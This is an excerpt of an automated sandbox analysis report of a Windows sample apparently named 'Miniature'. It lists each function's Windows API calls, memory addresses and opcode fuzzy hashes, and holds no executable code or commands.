                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00C76756
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00C76798
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00C767AB
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C767C1
                                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00C767CE
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3096461208-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 94d11696aa3c61ed2154ef0174caf97f845ab391a257ca7dfa299d4fb8c95fa7
                                                                                                                                                                                                                                                                                            • Instruction ID: 4ce5fc0b8497f2fddacaa2b8faf7d675063b35d6845cdabb040c0b363a1d7247
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 94d11696aa3c61ed2154ef0174caf97f845ab391a257ca7dfa299d4fb8c95fa7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8512071A00615AFDF18CF68CD85BAEBBB5FB48314F108129F51AE7690D770AE04CB50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C11802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C11488,?,00000000,?,?,?,?,00C1145A,00000000,?), ref: 00C11865
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00C11521
                                                                                                                                                                                                                                                                                            • KillTimer.USER32(00000000,?,?,?,?,00C1145A,00000000,?), ref: 00C115BB
                                                                                                                                                                                                                                                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 00C529B4
                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00C1145A,00000000,?), ref: 00C529E2
                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00C1145A,00000000,?), ref: 00C529F9
                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00C1145A,00000000), ref: 00C52A15
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00C52A27
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 641708696-0
                                                                                                                                                                                                                                                                                            • Opcode ID: fb5e8394b20acbee0d392347bfc897803f434b3d810dc68e32c1fa3cdb152615
                                                                                                                                                                                                                                                                                            • Instruction ID: 6c0b7cee1f939f28a406fef227d77fb1ecff4c413410c2805798e66bde3728e6
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb5e8394b20acbee0d392347bfc897803f434b3d810dc68e32c1fa3cdb152615
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE619D35501741DFDB358F14D888B69B7F6FB82326F189018E9538BA61C778AEC4EB44
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C12234: GetWindowLongW.USER32(?,000000EB), ref: 00C12242
                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00C12152
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ColorLongWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 259745315-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 6a1d2a519952848c3787f3b27e42d8b7f0d2764a3a31d92170ecee40f4bac9c1
                                                                                                                                                                                                                                                                                            • Instruction ID: ca365b1f0e73e87b0225ad05e39ac2f4f032701a5f7d16a35cdcfd28810c05b2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a1d2a519952848c3787f3b27e42d8b7f0d2764a3a31d92170ecee40f4bac9c1
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C419F79100680AFDB249B289C44BFD3775AB43375F244259FAB38B2E1C6318E92EB10
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00C60D31,00000001,0000138C,00000001,00000000,00000001,?,00C8EEAE,00CE2430), ref: 00C7A091
                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000,?,00C60D31,00000001), ref: 00C7A09A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00C60D31,00000001,0000138C,00000001,00000000,00000001,?,00C8EEAE,00CE2430,?), ref: 00C7A0BC
                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000,?,00C60D31,00000001), ref: 00C7A0BF
                                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C7A1E0
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                                                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                                                            • API String ID: 747408836-2268648507
                                                                                                                                                                                                                                                                                            • Opcode ID: a83179e5cb65146effca00750452a52c9df4857f432e865279fd996dbfb88afe
                                                                                                                                                                                                                                                                                            • Instruction ID: ddd3d3a423297f1de097a4ae20189424f36e18d24b678c86a9baad0b493e2644
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a83179e5cb65146effca00750452a52c9df4857f432e865279fd996dbfb88afe
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76415E72800109ABCB05FBE0DD86EEEB778AF59340F504165F505B20A2EB356F89EF61
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C18577: _wcslen.LIBCMT ref: 00C1858A
                                                                                                                                                                                                                                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C71093
                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C710AF
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C710CB
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C710F5
                                                                                                                                                                                                                                                                                            • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00C7111D
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C71128
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C7112D
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                                                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                                            • API String ID: 323675364-22481851
                                                                                                                                                                                                                                                                                            • Opcode ID: d5ac630a11cb519b0224c2903446e61ae4388e34e4fb84d7be9cc503bcc45b2e
                                                                                                                                                                                                                                                                                            • Instruction ID: ae758d6a27ddd7e72efa425680ca644535ebc4c47bee238b37c2a35acb013077
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d5ac630a11cb519b0224c2903446e61ae4388e34e4fb84d7be9cc503bcc45b2e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 79410772C10229ABCF11EBA4DC95DEEB778FF08750F448029E916A31A0EB319E45EF50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00CA4AD9
                                                                                                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00CA4AE0
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00CA4AF3
                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00CA4AFB
                                                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00CA4B06
                                                                                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00CA4B10
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00CA4B1A
                                                                                                                                                                                                                                                                                            • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00CA4B30
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00CA4B3C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                                                                            • String ID: static
                                                                                                                                                                                                                                                                                            • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                                                                            • Opcode ID: 6a0210a9333c75c18a3c5b5f635cb818efff9d326565ba09d1ecd494466b3e8a
                                                                                                                                                                                                                                                                                            • Instruction ID: 423419ec3a2163d8fa909d7993872b3afb4f5e8979ff0da54c4863e7fe9a46c0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a0210a9333c75c18a3c5b5f635cb818efff9d326565ba09d1ecd494466b3e8a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08316071100216BBDF119FA4DC08FDE3B69FF4E369F110211FA26A61A0C775D850EB64
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00C946B9
                                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00C946E7
                                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00C946F1
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C9478A
                                                                                                                                                                                                                                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00C9480E
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00C94932
                                                                                                                                                                                                                                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00C9496B
                                                                                                                                                                                                                                                                                            • CoGetObject.OLE32(?,00000000,00CB0B64,?), ref: 00C9498A
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 00C9499D
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C94A21
                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C94A35
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 429561992-0
                                                                                                                                                                                                                                                                                            • Opcode ID: dd5cb5860f04d047193fb8e16a457ac10a70fca856c0529cde2f519e4dd3eaee
                                                                                                                                                                                                                                                                                            • Instruction ID: cb1a9392a630802180da9e74ea5a38d82f3e0d7bc4eb6a947b0b65d3b6f8e286
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd5cb5860f04d047193fb8e16a457ac10a70fca856c0529cde2f519e4dd3eaee
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3C123716043059F8B04DF68C888D6BB7E9FF89748F10495DF99A9B250DB30ED46CB92
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00C88538
                                                                                                                                                                                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C885D4
                                                                                                                                                                                                                                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 00C885E8
                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00CB0CD4,00000000,00000001,00CD7E8C,?), ref: 00C88634
                                                                                                                                                                                                                                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C886B9
                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(?,?), ref: 00C88711
                                                                                                                                                                                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00C8879C
                                                                                                                                                                                                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C887BF
                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00C887C6
                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00C8881B
                                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00C88821
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2762341140-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 53268133dc6eff387e5beee3e2d6f655e95961a96875705341f70347c075a6ba
                                                                                                                                                                                                                                                                                            • Instruction ID: 9e305d91ee6ef09532abab37df0b83b7454c17575677a876e5d5b1d09f13447d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 53268133dc6eff387e5beee3e2d6f655e95961a96875705341f70347c075a6ba
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40C12B75A00105AFDB14DFA4C888DAEBBF5FF49308B548099F41ADB661DB30EE85DB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C7039F
                                                                                                                                                                                                                                                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 00C703F8
                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00C7040A
                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00C7042A
                                                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 00C7047D
                                                                                                                                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00C70491
                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C704A6
                                                                                                                                                                                                                                                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 00C704B3
                                                                                                                                                                                                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C704BC
                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C704CE
                                                                                                                                                                                                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C704D9
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2706829360-0
                                                                                                                                                                                                                                                                                            • Opcode ID: b18849719118f7bd862066baec20c14b9bbdf6399f9f548ec6262a03d0353eec
                                                                                                                                                                                                                                                                                            • Instruction ID: a270a47a3b4167e19e09978e07edbb3d59b7bad4922ae46af8b827247726e191
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b18849719118f7bd862066baec20c14b9bbdf6399f9f548ec6262a03d0353eec
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78415075A00219DFCB10DF64D848AEE7BB9FF48348F108069E91AA7261C734A945CF90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 00C7A65D
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00C7A6DE
                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A0), ref: 00C7A6F9
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00C7A713
                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A1), ref: 00C7A728
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00C7A740
                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 00C7A752
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00C7A76A
                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 00C7A77C
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00C7A794
                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(0000005B), ref: 00C7A7A6
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                            • Opcode ID: a906ee7abd5710d23b85210b296891b1742cb6b885d08d1b8734f9ed8728309b
                                                                                                                                                                                                                                                                                            • Instruction ID: 4778ad03aec9236f0212a9c01a0789e422403ff284fcf4050d79a5db32c66f16
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a906ee7abd5710d23b85210b296891b1742cb6b885d08d1b8734f9ed8728309b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9741A8645047C96DFF39576088443ADBEB06B95344F08C05DD5EB4B5C2EB949BC4C753
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                                                                                                            • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                                                                            • API String ID: 707087890-567219261
                                                                                                                                                                                                                                                                                            • Opcode ID: f90e252144f92d488b4f8495a2f5e963fdb87b8571331b9c9d16105c883f722f
                                                                                                                                                                                                                                                                                            • Instruction ID: 082e3767345799a96246fceb5fad16f20ad2b13439e2a1644c41b3e3fa308a6c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f90e252144f92d488b4f8495a2f5e963fdb87b8571331b9c9d16105c883f722f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9151B031A001169BCF14DFACC9559BEB7A5EF25360B21422DE83AE72C4DB31DE41D790
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CoInitialize.OLE32 ref: 00C941D1
                                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00C941DC
                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,00CB0B44,?), ref: 00C94236
                                                                                                                                                                                                                                                                                            • IIDFromString.OLE32(?,?), ref: 00C942A9
                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00C94341
                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C94393
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                                                                            • API String ID: 636576611-1287834457
